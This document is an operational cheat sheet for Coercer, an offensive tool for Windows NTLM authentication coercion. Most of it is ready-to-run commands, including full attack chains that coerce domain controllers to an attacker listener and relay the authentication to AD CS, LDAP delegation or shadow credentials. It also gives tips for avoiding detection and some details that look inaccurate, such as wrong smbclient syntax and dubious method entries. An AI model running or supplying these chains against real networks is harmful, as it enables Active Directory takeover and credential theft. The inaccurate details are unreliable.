Coercer
Coercer is a Python tool that automates Windows authentication coercion attacks by triggering NTLM authentication from target machines to an attacker-controlled listener. It supports multiple coercion methods including PetitPotam, PrinterBug, DFSCoerce, and ShadowCoerce, enabling NTLM relay attacks for AD privilege escalation.
Installation
Via pip
pip install coercerFrom GitHub
git clone https://github.com/p0dalirius/Coercer.git
cd Coercer
pip install -r requirements.txt
python3 -m coercer --helpRequirements
- Python 3.8+
- impacket
- pycryptodomex
- requests
- argparse
Quick Start
Basic coercion with credentials:
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAINScan target to identify working methods:
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAINCoerce with NTLM hash:
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c -d DOMAINCoercion Methods
Coercer supports numerous coercion methods across different MS-RPC protocols and Windows services:
| Method | Service | Protocol | MS-RPC Interface | Impact |
|---|---|---|---|---|
| PetitPotam | EfsRpc | \\pipe\efsrpc | EfsRpc | High - SYSTEM auth |
| PrinterBug | Spooler | \\pipe\spoolss | Printer (RPC) | High - SYSTEM auth |
| DFSCoerce | MSDFS | \\pipe\netdfs | NetDFS | Medium - SYSTEM auth |
| ShadowCoerce | Shadow Copy VSS | \\pipe\vssadmin | FSRVP | Medium - SYSTEM auth |
| MSEFSRCoerce | EFSRPC | \\pipe\efsrpc | EfsRpc | High - SYSTEM auth |
| Webexec | WebClient | HTTP | IOCTL | Medium - User context |
| DFSCoerceRPC | MSDFS | \\pipe\netdfs | NetDFS | Medium - SYSTEM auth |
| RprRemoteFindFirstFile | RemoteRegistry | \\pipe\winreg | RemoteRegistry | Low - Registry read |
| EfsRpcOpenFileRaw | EfsRpc | \\pipe\efsrpc | EfsRpc | High - SYSTEM auth |
| Lsasrv | LSA | \\pipe\lsarpc | LSA | Medium - LSASS auth |
| Tssession | Terminal Services | \\pipe\tssession | TermSrv | Low - TS context |
Scan Mode
Enumerate which coercion methods work without triggering full authentication:
# Scan all methods
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
# Scan with NTLM hash
coercer scan -t 192.168.1.50 -u domain\\user -H HASH -d DOMAIN
# Filter by method name
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --filter-method PetitPotam
# Filter by protocol
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --filter-protocol EfsRpc
# Filter by pipe name
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --filter-pipe-name efsrpc
# Scan with timeout per method
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --timeout 10Coerce Mode
Trigger actual NTLM authentication to listener:
# Basic coercion to listener
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
# Coerce specific method
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --method PetitPotam
# Coerce with output verbosity
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -v
# Coerce to alternative port
coercer coerce -l 192.168.1.100:4444 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
# Coerce with timeout
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --timeout 30Fuzz Mode
Discover new coercion methods by fuzzing RPC endpoints:
# Fuzz target to discover methods
coercer fuzz -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -l 192.168.1.100
# Fuzz with specific pipe
coercer fuzz -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -l 192.168.1.100 --pipe efsrpc
# Fuzz with timeout
coercer fuzz -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -l 192.168.1.100 --timeout 30Authentication Options
Username/Password Authentication
coercer coerce -l LISTENER -t TARGET -u domain\\username -p password -d DOMAIN
coercer coerce -l LISTENER -t TARGET -u username -p password -d DOMAINNTLM Hash Authentication (Pass-the-Hash)
coercer coerce -l LISTENER -t TARGET -u domain\\username -H LM:NTLM -d DOMAIN
coercer coerce -l LISTENER -t TARGET -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586cKerberos Authentication
coercer coerce -l LISTENER -t TARGET -k -d DOMAIN
export KRB5CCNAME=/tmp/user.ccache
coercer coerce -l LISTENER -t TARGET -kNo Authentication
coercer coerce -l LISTENER -t TARGET --no-pass
coercer scan -t TARGET --no-passLocal Authentication
coercer coerce -l LISTENER -t TARGET --localListener Setup
Using ntlmrelayx (SMB Relay)
# Terminal 1: Start ntlmrelayx
ntlmrelayx.py -t 192.168.1.60 --no-http-server -smb2support
# Terminal 2: Run coercer
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAINUsing Responder (LLMNR/NBT-NS)
# Terminal 1: Start Responder
responder -I eth0 -v
# Terminal 2: Run coercer with SMB relay
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAINCustom SMB Server Listener
# Using impacket smbserver
smbserver.py -smb2support -ip 192.168.1.100 share /tmp
# Run coercer to relay
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAINListening on Specific Port
coercer coerce -l 192.168.1.100:445 -t TARGET -u domain\\user -p password -d DOMAINCommon Attack Chains
Coerce to ntlmrelayx → AD CS ESC8
# Terminal 1: Start ntlmrelayx targeting ADCS
ntlmrelayx.py -t http://dc.domain.local/certsrv/certfnsh.asp -template DomainController --no-http-server -smb2support
# Terminal 2: Coerce to relay
coercer coerce -l ATTACKER_IP -t TARGET -u domain\\user -p password -d DOMAINCoerce to ntlmrelayx → LDAP for RBCD
# Terminal 1: Start ntlmrelayx for LDAP relay with RBCD
ntlmrelayx.py -t ldap://dc.domain.local --no-http-server -smb2support --delegate-access
# Terminal 2: Coerce target
coercer coerce -l ATTACKER_IP -t TARGET -u domain\\user -p password -d DOMAINCoerce to Relay for Shadow Credentials
# Terminal 1: Start ntlmrelayx targeting LDAP
ntlmrelayx.py -t ldap://dc.domain.local --no-http-server -smb2support --shadow-credentials
# Terminal 2: Trigger coercion
coercer coerce -l ATTACKER_IP -t TARGET -u domain\\user -p password -d DOMAINCoerce Machine Account to Relay for Privilege Escalation
# Scan first to find working method
coercer scan -t DC_IP -u domain\\user -p password -d DOMAIN
# Coerce DC to listener for relay to ADCS
coercer coerce -l ATTACKER_IP -t DC_IP -u domain\\user -p password -d DOMAIN --method PetitPotamWebDAV Coercion
Force HTTP authentication instead of SMB for cross-protocol relay attacks:
# Enable WebDAV coercion (requires WebClient service running)
coercer coerce -l http://ATTACKER_IP:80 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
# WebDAV with custom path
coercer coerce -l http://ATTACKER_IP:8080/share -t TARGET -u domain\\user -p password -d DOMAIN
# Combine with HTTP listener on ntlmrelayx
ntlmrelayx.py -I http://ATTACKER_IP:8080 -t http://target.com --no-smb-server
coercer coerce -l http://ATTACKER_IP:8080 -t TARGET -u domain\\user -p password -d DOMAINFiltering Options
Filter by Method Name
# Only PetitPotam
coercer scan -t TARGET -u domain\\user -p password --filter-method PetitPotam
# Multiple methods
coercer scan -t TARGET -u domain\\user -p password --filter-method "PetitPotam|PrinterBug"Filter by Protocol Name
# Only EfsRpc protocol
coercer scan -t TARGET -u domain\\user -p password --filter-protocol EfsRpc
# Multiple protocols
coercer scan -t TARGET -u domain\\user -p password --filter-protocol "EfsRpc|NetDFS"Filter by Pipe Name
# Only efsrpc pipe
coercer scan -t TARGET -u domain\\user -p password --filter-pipe-name efsrpc
# Multiple pipes
coercer scan -t TARGET -u domain\\user -p password --filter-pipe-name "efsrpc|netdfs"Combine Filters
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN \
--filter-method PetitPotam \
--filter-protocol EfsRpcTroubleshooting
Target Unreachable
# Verify connectivity
ping TARGET_IP
# Test SMB connectivity
smbclient -L //TARGET_IP -u domain\\user -p password
# Test with timeout
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN --timeout 30Authentication Failed
# Verify credentials
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN -v
# Try alternative username format
coercer scan -t TARGET -u DOMAIN\\user -p password -d DOMAIN
# Use NTLM hash instead
coercer scan -t TARGET -u domain\\user -H HASH -d DOMAINService Not Available
# Some methods require specific services running
# Check if MSDFS, Spooler, or EfsRpc services are active
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN -v
# Try with timeout increase
coercer coerce -l LISTENER -t TARGET -u domain\\user -p password -d DOMAIN --timeout 60No Working Methods Found
# Method may be patched or disabled
# Try scanning with verbose output
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN -v
# Enumerate installed hotfixes
wmic qfe list brief /format:listListener Connection Issues
# Verify listener is running and accessible
telnet LISTENER_IP 445
# Check firewall rules
sudo ufw allow 445/tcp
# Use verbose logging
coercer coerce -l LISTENER_IP -t TARGET -u domain\\user -p password -d DOMAIN -vBest Practices
- Always Scan First: Use
coercescan to identify working methods before triggering full coercion - Use Specific Methods: Target known-working methods to avoid noise and detection
- Filter Results: Leverage filtering to reduce network activity and operational footprint
- Combine with Relay: Pair Coercer with ntlmrelayx or Responder for effective privilege escalation
- Monitor Logs: Coercion attempts generate security event logs; operate during high activity periods
- Patch Management: Target systems with outdated patches are more likely to support multiple methods
- Service Enumeration: Verify target services (Spooler, EfsRpc, MSDFS) are running before coercion
- Credential Handling: Use NTLM hashes or Kerberos tickets to avoid passing plaintext credentials
- Clean Relay Chains: Ensure ntlmrelayx or relay tool is properly configured before coercing
- Documentation: Log all coercion attempts, timing, and results for post-exploitation analysis
Related Tools
| Tool | Purpose |
|---|---|
| PetitPotam | Standalone EfsRpc coercion tool; foundation for Coercer |
| ntlmrelayx | NTLM relay framework to authenticate against other services |
| Responder | LLMNR/NBT-NS poisoning and relay tool |
| Certipy | Active Directory Certificate Services enumeration and exploitation |
| krbrelayx | Kerberos relay attacks and alternative authentication methods |
| SpoolSample | Standalone PrinterBug implementation |
| PrintNightmare | RCE exploit for CVE-2021-1675 via Print Spooler |
| Shadow Credentials | Credential dumping via shadow credentials in Active Directory |